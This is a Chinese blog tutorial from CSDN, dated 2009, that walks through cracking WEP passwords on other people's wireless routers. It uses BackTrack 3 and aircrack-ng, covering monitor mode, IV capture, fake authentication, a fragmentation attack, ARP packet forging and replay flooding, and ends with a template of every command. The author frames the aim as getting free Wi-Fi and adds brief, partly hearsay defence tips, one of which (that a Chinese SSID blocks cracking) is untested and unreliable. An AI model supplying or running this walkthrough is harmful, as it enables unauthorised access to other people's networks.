教你用筆記本破解無線路由器密碼

最近很多人問我怎麼破解WiFi密碼…看來大家都對免費的東西比較有興趣。要麼也可能是我太招搖了…囧…

好吧，我就寫篇小小的教程，看完後，你應該能夠破解大部分無線路由器密碼了，寫這個教程也是為了加強大家對無線網路安全性的重視，後面也有簡單的防破解的辦法。

 

好了，正式開始。

首先，你需要的工具：

軟體：

①     BackTrack 3（簡稱BT3）

BT3有光碟片版，硬碟版還有隨身碟版，由於本本基本上可以刻碟，我就懶得弄那些隨身碟版，硬碟版了，直接刻了張碟，所以這篇教程使用光碟片版。

：

隨身碟版：http://backtrack.unixheads.org/bt3final_usb.iso

光碟片版：http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd

 

硬體：

②     一台筆記本，或者台式機配無線網卡。

如果是筆記本，在裝置管理員中查看一下你的網卡類型，我的是Intel 3945ABG的，現在市面上大部分筆記本都是用的這個網卡，所以，這篇教程主要針對這個網卡，如果不是，可能也能夠破解成功，我也就沒有測試了，台式機用的無線網卡同理，也有支援BT3的。

 

 

圖01-查看網卡

 

③     其餘瓜子，飲料什麼的自備。

 

關於前面的準備部分，網上很多教程都解釋得很詳細了，我也沒做過關於隨身碟版或者硬碟版，所以這部分跳過…有問題的在下面留言。

 

插入光碟片開機等待幾分鐘，有個選擇模式的介面，一般選擇第一個就會進入BT3的圖形介面，02，如果不能進去，輸入帳號root，密碼toor，然後輸入startx，也可以進去，但是我測試過，我的本本進不去，網上找到的答案是顯卡不支援（ATI 2400 XT）

進不去第一個的嘗試選擇第四個圖形模式，我的可以進去，如果這個也進不去，那就每個圖形模式都試試，都不行的話，那就是RP問題了，你的本本顯卡不支援…

 

圖02-進入後介面

 

然後點右下角的一個黑黑的顯示器一樣的表徵圖開啟一個控制台，03：

 

 

圖03-開啟控制台

這時候可以開始輸入命令了。

①  ifconfig -a

這是查看當前網卡資訊的，-a是顯示全部網卡，如果沒有這個參數，就無法顯示出無線網卡。這條命令可以查看當前網卡的MAC地址，其中，無線網卡的MAC地址是我們需要的，就在HWaddr後面的6個16進位字元，後面的那麼多00是不要的，應該是為了IP6做準備的。04。

 

圖04-查看網卡資訊

 

為了避免資訊泄露，我把我的MAC地址和要破解的AP（Access Point，存取點）的MAC地址的後2個位元組都隱藏了~呵呵~

可以看到，現在的無線網卡名稱是wlan0，這是BT3自動載入的iwl3945驅動起的名字，而這個驅動是不支援之後的破解工作的，所以我們需要換個驅動。

 

②  modprobe -r iwl3945

卸載當前iwl3945驅動。

 

③  modprobe ipwraw

載入ipwraw驅動，這個驅動是可以正常使用的。

載入之後再輸入ifconfig –a試試，就會發現wlan0不見了，出來了個wifi0，05，這就是ipwraw給我們的網卡起的名字。這個名字之後會多次用到。這時候也需要把自己的MAC地址記住，最好是在案頭建立一個文字檔，然後複製進去，方便之後的命令調用。

 

圖05-載入3945驅動

 

④  airomon-ng start wifi0

這條命令是設定無線網卡為監聽模式，因為Windows下這個很難實現，而Linux由於開源，所以大部分駭客軟體都是Linux平台下的，我剛開始用BT3的時候就因為iwl3945驅動不能使用監聽模式而卡在這裡了。設定成功後，06。

 

圖06-設定監聽模式

 

⑤  airodump-ng wifi0

既然要破解，那麼總得有目標吧，這條命令就是檢測當前所能搜尋到的所有無線網路訊號。其中包括頻道，訊號強度等資訊。運行後07。

 

圖07-查看存在AP

 

裡面的幾個參數，解釋一下，網上也有解釋的，但是解釋得不太清楚。

BSSID——這個就是路由器的MAC地址了，我要破解的是下面那個，上面那個訊號太差。

PWR——這個是訊號強度，但是我的電腦顯示不出來，顯示不出來也沒關係，不妨礙之後的破解的，只要在Windows中顯示訊號很好就可以了。

Beacons——這個是路由器對外發包，可能是SSID廣播，我也不太清楚，如果看到這個資料在漲，就代表這個AP還行，一般是1秒漲20~30吧。太慢了就有可能因為訊號的原因破解失敗。

#Data——這個資料最最重要，這個代表可以用於破解的包，一般這個資料到達1W+，一般的64位的WEP密碼就能夠破解了。之後我們要做的，就是等待他到達1W，如果資料增長很緩慢（幾分鐘才增加1），那就只好用另一種方法了，就是發包攻擊，這個在後面有介紹。

#/s——DATA增加的速度。

CH——頻道，總共有11個頻道，可以看到，我要破解的AP的頻道是11。

MB——無線速度，現在一般都是54MB的了。

CIPHER——加密方式，如果是WEP，就能夠用這樣的方式破解，如果是WPA/WPA2，目前就只能暴力破解了，話說我現在還不知道怎麼暴力破解…等你破解出來的密碼都是12345，1234567890之類的密碼時，你就會覺得自己付出的和得到的完全不成比例…TAT。在這裡我們只考慮WEP加密的情況。

AUTH——這個應該是authorization的縮寫，也就是授權的意思，我也不明白這個有什麼用。可能路由器要給用戶端發包，就需要驗證用戶端許可權。現在這裡是空的，之後會有值的。

ESSID——簡單理解，這個就是路由器的名字了。

這一步，我們要做的就是確定需要破解的路由器和它的MAC地址，DATA值增長速度比較快，或者在Windows下訊號比較好，或者PWR比較高的，優先。同樣，可以把MAC地址寫到文字檔中去。

 

⑥  airodump-ng --ivs -w god -c 11 wifi0

這個命令是檢測某個頻道的路由器發包，並且儲存可用包(也就是#DATA)到一個檔案god，這個god是可以改成你喜歡的名字的，但是自己要記住…

參數中，

-c是指頻道，後面跟著我要破解的路由器的訊號頻道，也就是11。

wifi0是我的網卡名稱。

輸入完這個命令後，這個視窗就不用關了，它要一直抓包的，我們稱之為1號視窗。

 

這時候我們重新開啟一個控制台，也就是黑框框。輸入之後的命令：

⑦  aireplay-ng -1 0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0

-a後面跟著的是目標MAC地址。

-h後面跟著的是原生無線網卡MAC地址。

wifi0是本機無線網卡名稱

 

這條命令是擷取授權，測試類比發包攻擊，具體有什麼用，我不太清楚… 可能是測試能否通過發包進行攻擊吧。

成功後會出現如下資訊：Association successful

然後上面那個視窗中AUTH欄值變成OPN。

 

圖08-測試連接

 

⑧  aireplay-ng -5 -b 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0

參數中

-5是aireplay這個程式使用的模式，無需深究。

-b後面跟著的是目標MAC地址。

-h後面跟著的是原生無線網卡MAC地址。

wifi0是本機無線網卡名稱

 

這個命令，我的理解是是擷取到一個特定的包製作攻擊源，然後可以用這個攻擊源進行發包攻擊。這一步是最難成功的，往往失敗就是因為這一步。如果你選擇的AP等了半天DATA值還是0，可以放棄那個了。輸入命令後，就開始抓包了，下面的資料會漲，09，等抓到一個有用的包的時候，它會問你是否用這個包，10，按Y，然後斷行符號就OK。

但是往往擷取到的包都是攻擊失敗的，11，這樣就只好繼續等了，它會自動開始下一輪抓包的，所以，破解也是需要RP的…RP低的兄弟姐妹還是飄走吧……

 

圖09-擷取可用包

 

 

圖10-擷取到可用包

 

 

圖11-攻擊失敗

 

再說說DATA值為什麼會保持在0或者增長緩慢。如果這個AP是有用戶端無線串連的，那麼它發的資料就多，擷取到可用包的幾率就大。如果沒用戶端串連，它做的工作就是不斷向外發送SSID廣播，簡單說就是告訴大家，我是一個路由器，我的名字是****，我的訊號有多大，我有沒有密碼等等。這樣的包，可用來破解密碼的（也就是DATA包）是鳳毛麟角啊，一般5000個包能出一個都算不錯了…

 

在等待的過程中，可以開啟另一個視窗，輸入第9條命令

⑨  aircrack-ng -b 00:23:CD:89:**:** god-01.ivs

參數中

-b後面跟著的是目標MAC地址。

 

這個就是正式破解了，其中god-01.ivs是我們抓的資料包，也就是DATA包儲存成的檔案，如果你多次使用airodump抓包，那麼你可以去root目錄看看最新產生的檔案名稱，然後相應變更。這個程式就用這些抓到的DATA包來計算出密碼。運行命令後12。

 

圖12-嘗試破解失敗

 

可以看到破解失敗了。只有34個IVs（DATA包），不失敗才怪呢，之前說過一般要1W+才可以的。

第2個視窗中，等啊等，終於等到一個有用的包了，成功資訊13

 

圖13-擷取到可用於攻擊的包

 

成功後程式會產生一個xor檔案fragment-0806-150830.xor，記住這個就好，下一條命令要用。

接著輸入：

⑩  packetforge-ng -0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** -k 255.255.255.255 –l 255.255.255.255 -y fragment-0806-150830.xor -w moon

參數中

-a後面跟著的是目標MAC地址。

-h後面跟著本地無線網卡MAC地址。

-y是上一步中產生的那個xor檔案

-w是產生的ARP包檔案名稱，我填了moon，可更改，也要記住。

 

這個命令是偽造ARP包，用於ARP攻擊。

 

最後一條命令，就讓路由器做臨死前的掙紮吧…

⑪  aireplay-ng -2 -r moon -x 512 wifi0

moon是上一步儲存的ARP包檔案名稱。

512是攻擊線程，一般512夠了，1024我怕大了，沒敢弄。

wifi0是網卡名稱。

 

輸入完這一條，就可以看到第1個視窗中的DATA值暴增，14。

 

圖14-發包攻擊

 

圖上可以看到，DATA的增長速度是361個/s。

然後我們就切換到第3個視窗，就是aircrack那個視窗看看吧，等DATA到了5000，就會自動開始 破解，如果沒成功，DATA到達10000又會破解一次。這一切都發生地很迅速。

 

很快，密碼出來了，15。

 

圖15-破解成功

 

從圖15可以看到，密碼就是8264287788。由於WEP中64位加密是5個ASCII碼或者10個16進位字元，所以，我們可以切換Windows，然後用8264287788串連上去，16，訊號很好哦！

 

圖16-無線串連

 

【總結】

把所有用到的命令都總結一下，[]內的是需要更改的，方便大家對照修改。

①  ifconfig –a

②  modprobe -r iwl3945

③  modprobe ipwraw

④  airomon-ng start [網卡名]

⑤  airodump-ng [網卡名]

⑥  airodump-ng --ivs -w [DATA包檔案名稱] -c [頻道] [網卡名]

⑦  aireplay-ng -1 0 -a [目標MAC] -h [網卡MAC] [網卡名]

⑧  aireplay-ng -5 -b [目標MAC] -h [網卡MAC] [網卡名]

⑨  aircrack-ng -b [目標MAC] [DATA包檔案名稱]-0*.ivs

⑩  packetforge-ng -0 -a [目標MAC] -h [網卡MAC] -k 255.255.255.255 –l 255.255.255.255 -y [上一步的xor檔案名稱] -w [攻擊包檔案名稱]

⑪  aireplay-ng -2 -r [攻擊包檔案名稱] -x [攻擊線程] [網卡名]

 

在本教程中:

[網卡名] ——wifi0

[DATA包檔案名稱]——god

[頻道]——11

[目標MAC]——00:23:CD:89:**:**

[網卡MAC]——00-1F-3C-5B-**-**

[上一步的xor檔案名稱]——fragment-0806-150830.xor

[攻擊包檔案名稱]——moon

[攻擊線程]——512

 

然後說說怎麼樣防範自己的AP被像我這樣的不速之客破解然後蹭網吧。

 

①  你可以關閉SSID廣播，這樣別人就搜尋不到你的無線訊號了。

②  你可以設定WPA/WPA2加密，現在主流的路由器都支援這個功能，為什麼不用呢？

③  你可以把你的SSID改成中文，雖然我沒試過，但是網上貌似說這樣就不可以破解了。

④  你可以設定MAC地址綁定，但是可以查看合法MAC並偽裝MAC的方式破解（感謝樓下兄弟提供建議~）

 

 

至此，教程就結束了，有什麼問題，可以跟帖問。

我也是個菜鳥，這篇教程也是東拼西湊，再加上自己的一些見解弄出來的，難免有不對的地方，歡迎指正~

最後，我和諧地宣布：

本教程旨在普及無線網路知識，加強大家對無線網路安全問題的認識，希望大家不要拿來做壞事哦~用這個方法造成的一切後果自負，我概不負責。嘿嘿~

 

本文來自CSDN部落格，轉載請標明出處：http://blog.csdn.net/sytzz/archive/2009/08/22/4473401.aspx